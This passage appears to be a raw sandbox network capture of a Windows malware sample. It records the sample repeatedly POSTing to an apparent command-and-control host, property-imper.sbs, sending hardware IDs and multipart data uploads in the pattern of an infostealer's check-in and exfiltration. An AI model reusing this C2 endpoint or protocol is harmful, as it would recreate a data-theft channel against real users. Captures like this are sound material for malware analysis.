                                                                                                                                                                                                2024-11-24 02:04:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.549705104.21.33.1164432608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:10 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 53
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-24 02:04:10 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                2024-11-24 02:04:10 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:10 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=q3a405281ivmjhvndnmtvs4pkl; expires=Wed, 19-Mar-2025 19:50:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYVV%2FimIgOmrayapFZ4Nc0l6s3pA5Uxric5nuu%2BBZNQJO2sPsg7isyP9KvVjuO6%2B3RQ8p%2BnNSlELm%2B1%2FE07mxH8563OO4HtxGyDwUfhcTblSBk7ix59WFms1g7gAlJhWl2IAQE8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e75d3a50d454314-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1569048&cwnd=181&unsent_bytes=0&cid=6bbebc13d7883f79&ts=732&x=0"
                                                                                                                                                                                                2024-11-24 02:04:10 UTC350INData Raw: 31 35 31 66 0d 0a 75 34 39 69 43 45 30 77 61 56 6e 73 4f 37 70 50 33 36 58 42 53 6c 6b 79 38 56 67 4b 6b 4a 2f 73 63 35 61 61 72 36 54 59 6e 5a 7a 41 72 52 51 71 64 77 52 46 65 35 39 65 6d 48 57 72 31 37 51 76 64 52 43 51 50 43 69 71 2b 59 30 66 35 66 2b 44 68 71 37 77 76 6f 48 70 41 32 51 2b 56 55 56 37 69 55 4f 59 64 59 54 65 34 79 38 33 45 4d 74 36 62 2f 72 39 6a 52 2f 30 2b 38 54 4c 71 50 48 2f 30 2b 4d 46 59 43 68 54 44 54 69 41 56 74 38 71 75 73 53 72 4a 44 42 66 6d 54 55 6f 76 4c 32 4a 43 62 53 67 6a 65 6d 39 36 66 33 32 37 68 46 6a 62 30 31 46 49 73 35 65 31 47 33 6c 68 36 41 76 4f 31 36 58 50 47 48 34 39 34 51 58 39 66 37 46 31 4c 48 37 39 4e 50 74 42 6d 45 69 57 68 6b 31 69 6c 48 55 4c 4c 44 45 34 32 5a 37 56 34 74 36 4d 4c 4b 75 76 42 4c 6c 36
                                                                                                                                                                                                Data Ascii: 151fu49iCE0waVnsO7pP36XBSlky8VgKkJ/sc5aar6TYnZzArRQqdwRFe59emHWr17QvdRCQPCiq+Y0f5f+Dhq7wvoHpA2Q+VUV7iUOYdYTe4y83EMt6b/r9jR/0+8TLqPH/0+MFYChTDTiAVt8qusSrJDBfmTUovL2JCbSgjem96f327hFjb01FIs5e1G3lh6AvO16XPGH494QX9f7F1LH79NPtBmEiWhk1ilHULLDE42Z7V4t6MLKuvBLl6
                                                                                                                                                                                                2024-11-24 02:04:10 UTC1369INData Raw: 42 6d 51 75 58 77 73 70 68 6c 4c 54 4b 4b 2f 4d 71 69 55 32 55 4a 34 77 5a 2f 48 39 69 52 76 2b 39 38 66 43 74 2f 4c 34 32 65 31 41 4a 47 39 56 45 33 76 57 47 66 73 6f 72 63 43 76 50 6e 6c 71 30 79 55 6d 36 37 32 4a 48 62 53 67 6a 63 36 2f 2f 50 33 53 34 67 4e 69 4a 45 41 4c 4b 59 68 55 33 54 2b 37 77 71 30 69 4f 45 4b 5a 4e 47 37 78 39 49 55 59 38 66 2f 4a 68 76 53 2f 2b 63 47 74 57 43 6f 4f 58 77 41 33 68 45 37 59 62 61 4b 4a 75 6d 67 38 58 4e 4e 69 4b 50 62 38 69 68 44 77 39 73 50 43 74 76 6e 77 31 4f 49 47 59 43 39 56 41 54 4f 47 57 4e 55 6d 73 73 65 6d 4a 54 39 57 6e 7a 74 74 73 72 50 4f 46 75 79 34 6c 59 61 55 2b 50 33 4c 72 7a 56 70 49 56 77 4d 4c 63 35 47 6c 6a 54 39 77 4b 39 6f 59 78 43 64 50 32 66 67 2f 4a 77 55 2b 75 72 42 77 37 7a 79 2f 64 66
                                                                                                                                                                                                Data Ascii: BmQuXwsphlLTKK/MqiU2UJ4wZ/H9iRv+98fCt/L42e1AJG9VE3vWGfsorcCvPnlq0yUm672JHbSgjc6//P3S4gNiJEALKYhU3T+7wq0iOEKZNG7x9IUY8f/JhvS/+cGtWCoOXwA3hE7YbaKJumg8XNNiKPb8ihDw9sPCtvnw1OIGYC9VATOGWNUmssemJT9WnzttsrPOFuy4lYaU+P3LrzVpIVwMLc5GljT9wK9oYxCdP2fg/JwU+urBw7zy/df
                                                                                                                                                                                                2024-11-24 02:04:10 UTC1369INData Raw: 56 77 4d 4c 63 35 47 6c 6a 54 39 77 4b 39 6f 59 78 43 66 4d 32 6a 35 39 34 6f 52 38 2f 58 49 78 62 33 38 38 39 37 6e 44 6d 30 72 58 67 49 32 69 46 6e 66 4b 62 6a 56 70 69 45 33 58 4e 4e 30 4b 50 58 6c 7a 6b 6d 30 31 38 72 51 75 64 44 39 79 4f 52 41 64 57 46 4c 53 7a 79 43 47 59 42 74 75 73 4b 72 49 7a 31 59 6b 79 68 74 2f 50 61 50 47 2f 4c 35 77 4d 71 38 2f 2f 2f 5a 36 77 78 71 4b 46 55 5a 4b 59 74 66 79 69 66 39 69 65 4d 76 49 78 44 4c 65 6c 37 69 36 70 38 48 74 73 33 4f 79 4c 54 34 36 4a 6e 79 54 6e 4e 76 56 51 64 37 31 68 6e 54 4c 62 48 41 71 79 34 2f 57 4a 77 31 59 65 44 38 67 68 2f 6d 2f 38 33 50 74 50 44 79 30 4f 41 48 5a 79 52 59 42 6a 2b 4a 57 4a 68 6a 2f 63 43 37 61 47 4d 51 70 53 70 6c 2f 74 4f 46 48 66 32 34 30 6f 69 6a 76 2f 6e 56 72 56 67 71
                                                                                                                                                                                                Data Ascii: VwMLc5GljT9wK9oYxCfM2j594oR8/XIxb38897nDm0rXgI2iFnfKbjVpiE3XNN0KPXlzkm018rQudD9yORAdWFLSzyCGYBtusKrIz1Ykyht/PaPG/L5wMq8///Z6wxqKFUZKYtfyif9ieMvIxDLel7i6p8Hts3OyLT46JnyTnNvVQd71hnTLbHAqy4/WJw1YeD8gh/m/83PtPDy0OAHZyRYBj+JWJhj/cC7aGMQpSpl/tOFHf240oijv/nVrVgq
                                                                                                                                                                                                2024-11-24 02:04:10 UTC1369INData Raw: 53 50 58 64 30 6f 75 63 43 6e 4c 6a 51 51 33 58 70 76 36 72 33 57 55 64 76 66 2b 49 53 62 78 62 37 47 6f 78 6b 71 4b 46 35 4c 59 38 35 56 32 79 47 31 79 4b 55 68 4e 31 71 61 4d 57 54 35 2b 59 49 59 38 66 37 4d 77 37 2f 2b 2b 74 58 6e 42 6d 6b 73 58 51 51 30 68 68 6d 57 62 62 72 66 34 33 42 37 64 59 51 78 5a 76 53 39 6b 56 2f 74 75 4d 72 4b 2b 71 65 2b 31 65 51 47 62 43 70 65 43 6a 32 47 58 4e 41 70 76 4d 47 6c 4b 7a 52 55 6c 6a 74 6e 39 76 47 41 47 2f 58 35 77 63 32 31 39 50 75 5a 6f 30 42 74 4e 78 4a 54 65 37 39 61 7a 6a 71 74 79 2b 4d 33 64 55 6e 54 50 57 53 79 70 63 34 51 35 76 4c 48 79 4c 2f 77 2b 39 72 69 42 32 63 70 58 67 45 79 68 6c 2f 58 4a 4b 2f 45 72 79 59 38 58 70 38 30 5a 66 6a 2b 67 31 47 36 75 4d 72 65 2b 71 65 2b 39 65 6f 4e 52 43 52 65 44
                                                                                                                                                                                                Data Ascii: SPXd0oucCnLjQQ3Xpv6r3WUdvf+ISbxb7GoxkqKF5LY85V2yG1yKUhN1qaMWT5+YIY8f7Mw7/++tXnBmksXQQ0hhmWbbrf43B7dYQxZvS9kV/tuMrK+qe+1eQGbCpeCj2GXNApvMGlKzRUljtn9vGAG/X5wc219PuZo0BtNxJTe79azjqty+M3dUnTPWSypc4Q5vLHyL/w+9riB2cpXgEyhl/XJK/EryY8Xp80Zfj+g1G6uMre+qe+9eoNRCReD
                                                                                                                                                                                                2024-11-24 02:04:10 UTC958INData Raw: 4b 62 66 4f 48 70 44 42 37 43 4e 4d 4d 62 2b 4c 74 6a 56 50 46 37 73 37 51 73 66 4c 79 6d 66 4a 4f 63 32 39 56 42 33 76 57 47 64 34 69 74 4d 53 73 4b 54 4a 63 6e 6a 39 68 39 2f 79 49 46 66 37 79 7a 63 43 38 2f 76 76 54 37 67 46 67 4a 6c 55 44 50 49 31 4c 6d 47 50 39 77 4c 74 6f 59 78 43 36 50 58 72 38 37 63 34 4f 75 75 47 4e 77 62 61 2f 70 70 6e 70 43 6d 55 72 56 51 63 39 69 31 2f 56 4c 4c 4c 47 6f 79 63 2f 57 35 6f 38 61 66 2f 34 67 78 58 6d 38 73 62 4a 74 76 62 79 31 4b 31 4f 4b 69 68 4b 53 32 50 4f 61 4e 55 6a 73 38 43 31 61 43 51 65 69 6e 70 76 2f 72 33 57 55 66 58 30 77 73 57 31 2f 50 33 59 35 78 4a 34 49 31 73 44 50 6f 4a 53 31 69 75 76 77 61 77 68 4f 46 4f 61 50 57 44 2b 39 34 30 57 74 4c 61 4e 77 61 4b 2f 70 70 6e 4f 46 33 6f 69 45 68 52 31 6c 78
                                                                                                                                                                                                Data Ascii: KbfOHpDB7CNMMb+LtjVPF7s7QsfLymfJOc29VB3vWGd4itMSsKTJcnj9h9/yIFf7yzcC8/vvT7gFgJlUDPI1LmGP9wLtoYxC6PXr87c4OuuGNwba/ppnpCmUrVQc9i1/VLLLGoyc/W5o8af/4gxXm8sbJtvby1K1OKihKS2POaNUjs8C1aCQeinpv/r3WUfX0wsW1/P3Y5xJ4I1sDPoJS1iuvwawhOFOaPWD+940WtLaNwaK/ppnOF3oiEhR1lx
                                                                                                                                                                                                2024-11-24 02:04:10 UTC1369INData Raw: 32 66 34 64 0d 0a 4a 47 2b 62 33 77 73 75 35 2f 2f 76 4c 37 42 4a 6c 4a 46 63 49 50 34 46 57 31 43 57 33 68 2b 31 6f 50 45 6a 54 59 69 6a 65 2f 70 38 62 74 74 2f 58 30 4c 33 7a 37 39 4c 67 44 43 6f 77 48 42 4a 37 69 56 57 59 64 66 33 48 6f 69 55 70 56 5a 49 77 59 76 2f 31 67 52 54 78 39 38 6e 43 73 66 48 73 31 2b 49 41 62 43 52 54 44 6a 69 46 55 39 59 6b 72 34 66 74 61 44 78 49 30 32 49 6f 32 4f 61 50 48 50 69 36 34 38 32 73 2b 4c 7a 34 34 77 74 74 49 30 52 4c 4a 4d 42 41 6d 43 71 78 68 2f 74 6f 4d 6c 36 66 4f 57 2f 36 39 59 73 52 2f 2f 6a 43 7a 4c 54 34 37 4e 50 68 43 6e 67 67 55 51 59 2f 67 31 50 64 4a 4b 2f 43 71 69 35 37 48 74 4d 39 63 4c 4b 6c 7a 69 6e 2f 39 76 2f 46 6f 62 2f 68 6c 2f 52 41 62 53 4d 53 55 33 75 4e 58 74 73 73 74 38 36 76 4a 7a 78 55
                                                                                                                                                                                                Data Ascii: 2f4dJG+b3wsu5//vL7BJlJFcIP4FW1CW3h+1oPEjTYije/p8btt/X0L3z79LgDCowHBJ7iVWYdf3HoiUpVZIwYv/1gRTx98nCsfHs1+IAbCRTDjiFU9Ykr4ftaDxI02Io2OaPHPi6482s+Lz44wttI0RLJMBAmCqxh/toMl6fOW/69YsR//jCzLT47NPhCnggUQY/g1PdJK/Cqi57HtM9cLKlzin/9v/Fob/hl/RAbSMSU3uNXtsst86vJzxU
                                                                                                                                                                                                2024-11-24 02:04:10 UTC1369INData Raw: 58 6c 7a 6b 6d 30 79 73 66 46 74 75 6e 7a 31 71 30 66 4a 44 59 53 44 44 66 4f 41 5a 67 2f 72 38 65 6f 4b 44 78 65 67 54 74 67 2f 66 65 4f 46 2f 2f 79 7a 73 2b 2b 38 66 66 66 37 41 31 72 4c 6c 49 4f 4f 34 64 4c 31 57 33 7a 68 36 51 77 65 77 6a 54 44 57 54 35 7a 49 30 48 74 4f 65 44 33 2f 72 34 38 70 6d 31 51 47 73 39 58 77 4d 2f 6a 6c 54 65 4a 72 7a 47 6f 43 67 37 55 35 4d 2f 59 2f 33 37 69 52 7a 2b 38 63 54 55 73 76 76 73 32 65 45 45 4b 6d 45 53 44 43 50 4f 41 5a 67 64 76 73 79 76 4b 44 5a 46 30 79 55 6d 36 37 32 4a 48 62 53 67 6a 63 36 78 39 50 6a 53 37 67 4e 6b 4a 46 67 45 4e 49 52 66 33 69 57 34 78 36 38 6f 50 6c 61 58 50 6d 62 31 38 34 4d 51 35 76 76 45 68 76 53 2f 2b 63 47 74 57 43 6f 50 57 52 30 2b 69 55 2b 61 47 4c 37 4a 72 53 38 74 45 49 77 46 4a
                                                                                                                                                                                                Data Ascii: Xlzkm0ysfFtunz1q0fJDYSDDfOAZg/r8eoKDxegTtg/feOF//yzs++8fff7A1rLlIOO4dL1W3zh6QwewjTDWT5zI0HtOeD3/r48pm1QGs9XwM/jlTeJrzGoCg7U5M/Y/37iRz+8cTUsvvs2eEEKmESDCPOAZgdvsyvKDZF0yUm672JHbSgjc6x9PjS7gNkJFgENIRf3iW4x68oPlaXPmb184MQ5vvEhvS/+cGtWCoPWR0+iU+aGL7JrS8tEIwFJ
                                                                                                                                                                                                2024-11-24 02:04:10 UTC1369INData Raw: 52 73 2f 76 66 31 4c 7a 38 36 4e 71 71 50 6c 51 50 57 51 63 34 67 6c 6a 66 62 66 4f 48 72 47 68 6a 61 64 4d 35 65 75 43 79 6e 77 66 35 36 4d 71 4b 73 75 37 7a 31 61 31 4f 4b 6d 4e 57 41 44 65 4c 58 73 68 69 72 39 65 6f 4a 43 30 63 6c 79 67 6f 76 4c 32 66 47 76 76 71 77 38 48 31 37 75 6a 55 2f 51 4e 76 4b 42 34 44 4b 6f 4e 56 6d 47 50 39 30 71 67 6b 50 56 32 47 64 58 6e 6b 2f 70 67 57 75 50 44 63 79 37 61 2f 77 5a 65 74 47 43 70 33 45 6a 34 34 67 46 66 66 4f 36 79 4b 67 79 4d 33 55 35 38 37 62 37 4b 7a 7a 68 65 30 6f 4a 36 49 2b 76 76 76 6d 62 56 51 4f 48 51 48 57 47 7a 65 43 38 64 6a 70 49 65 31 61 47 4d 43 33 58 70 36 73 71 58 4f 56 76 66 71 33 38 43 35 36 66 32 65 30 7a 35 72 49 6c 31 48 4e 59 56 5a 33 7a 32 72 33 4f 38 67 4f 45 71 4a 42 46 62 5a 38 59
                                                                                                                                                                                                Data Ascii: Rs/vf1Lz86NqqPlQPWQc4gljfbfOHrGhjadM5euCynwf56MqKsu7z1a1OKmNWADeLXshir9eoJC0clygovL2fGvvqw8H17ujU/QNvKB4DKoNVmGP90qgkPV2GdXnk/pgWuPDcy7a/wZetGCp3Ej44gFffO6yKgyM3U587b7Kzzhe0oJ6I+vvvmbVQOHQHWGzeC8djpIe1aGMC3Xp6sqXOVvfq38C56f2e0z5rIl1HNYVZ3z2r3O8gOEqJBFbZ8Y
                                                                                                                                                                                                2024-11-24 02:04:10 UTC1369INData Raw: 79 74 62 34 32 66 33 50 37 6b 41 6b 62 30 70 4c 59 38 35 34 30 6a 32 77 79 4b 52 6f 64 52 43 58 65 6a 43 79 32 49 4d 63 38 66 62 4b 68 4a 76 31 37 74 54 69 42 79 70 68 45 67 64 37 31 68 6e 5a 4a 36 33 4b 72 43 39 33 56 34 6b 39 4b 4c 79 39 67 46 47 73 75 4d 7a 4d 71 76 4c 78 33 71 45 47 5a 43 45 53 46 48 57 58 47 63 35 74 35 5a 54 74 61 43 6b 51 79 33 6f 76 2f 50 43 50 45 76 72 37 33 39 53 38 2f 4f 6a 61 71 6a 35 55 43 6c 38 47 50 6f 42 65 35 68 4f 63 7a 62 4d 6c 4e 46 66 52 47 6d 2f 6b 2f 72 41 76 77 2b 6e 4b 31 76 6a 5a 2f 63 2f 75 51 43 52 76 53 6b 74 6a 7a 6e 6a 53 50 62 44 49 70 47 6f 62 56 34 55 35 4b 4c 79 39 69 6c 47 73 75 4f 6a 4c 74 2f 72 77 33 71 38 68 59 44 39 66 42 44 7a 4d 65 64 38 37 76 6f 66 74 61 44 63 51 79 33 70 70 2b 4f 32 44 48 76 4f
                                                                                                                                                                                                Data Ascii: ytb42f3P7kAkb0pLY8540j2wyKRodRCXejCy2IMc8fbKhJv17tTiByphEgd71hnZJ63KrC93V4k9KLy9gFGsuMzMqvLx3qEGZCESFHWXGc5t5ZTtaCkQy3ov/PCPEvr739S8/Ojaqj5UCl8GPoBe5hOczbMlNFfRGm/k/rAvw+nK1vjZ/c/uQCRvSktjznjSPbDIpGobV4U5KLy9ilGsuOjLt/rw3q8hYD9fBDzMed87voftaDcQy3pp+O2DHvO


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.549706104.21.33.1164432608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:12 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=RHEPKVDM64
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 12793
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-24 02:04:12 UTC12793OUTData Raw: 2d 2d 52 48 45 50 4b 56 44 4d 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 52 48 45 50 4b 56 44 4d 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 48 45 50 4b 56 44 4d 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 52 48 45 50 4b 56 44 4d 36 34 0d 0a 43 6f
                                                                                                                                                                                                Data Ascii: --RHEPKVDM64Content-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--RHEPKVDM64Content-Disposition: form-data; name="pid"2--RHEPKVDM64Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--RHEPKVDM64Co
                                                                                                                                                                                                2024-11-24 02:04:13 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:13 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=lcq66gkehe953442t1fsqrvtbh; expires=Wed, 19-Mar-2025 19:50:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56X9BbhvS5phZ30l1nPAbHNlT%2FbqkcUyMoxK1%2BwXwiWIAA0iI5gJO3KfbWPX6u56uXEy0ps5yfo0AjbJ%2Fb%2BGglqYQTcNXg018uMzpdQGnXsKoSjtRr7QTykb7GjnY0XSENv9UjI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e75d3b2a93b0f65-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1677&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13727&delivery_rate=1742243&cwnd=222&unsent_bytes=0&cid=e3fd1eca91b0a794&ts=883&x=0"
                                                                                                                                                                                                2024-11-24 02:04:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-24 02:04:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.549707104.21.33.1164432608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:14 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=8ZOGK4M3O
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 15029
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-24 02:04:14 UTC15029OUTData Raw: 2d 2d 38 5a 4f 47 4b 34 4d 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 38 5a 4f 47 4b 34 4d 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 5a 4f 47 4b 34 4d 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 5a 4f 47 4b 34 4d 33 4f 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                Data Ascii: --8ZOGK4M3OContent-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--8ZOGK4M3OContent-Disposition: form-data; name="pid"2--8ZOGK4M3OContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8ZOGK4M3OConten
                                                                                                                                                                                                2024-11-24 02:04:15 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:15 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=5uhs0s12aijqpb1qdpvqbd9gok; expires=Wed, 19-Mar-2025 19:50:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCwCV6V3BNkKRIQPhiKorK7S8XY7NCvnTrrkuH6prILXAxfHU8mz%2FkQt%2BrSS%2Fzkjj75nbHo2isYBPRZ9M6C8Ar16KnUbbPIeRCITainzOsj01S6C2evK1SlmSLR3onINooWY6ZE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e75d3c1b8cd8cba-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1792&sent=15&recv=20&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15962&delivery_rate=1566523&cwnd=229&unsent_bytes=0&cid=04a17ca46a8f32cc&ts=999&x=0"
                                                                                                                                                                                                2024-11-24 02:04:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-24 02:04:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.549708104.21.33.1164432608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:17 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=3OB78JD93PBLOD3Q0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 20567
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-24 02:04:17 UTC15331OUTData Raw: 2d 2d 33 4f 42 37 38 4a 44 39 33 50 42 4c 4f 44 33 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 33 4f 42 37 38 4a 44 39 33 50 42 4c 4f 44 33 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 4f 42 37 38 4a 44 39 33 50 42 4c 4f 44 33 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
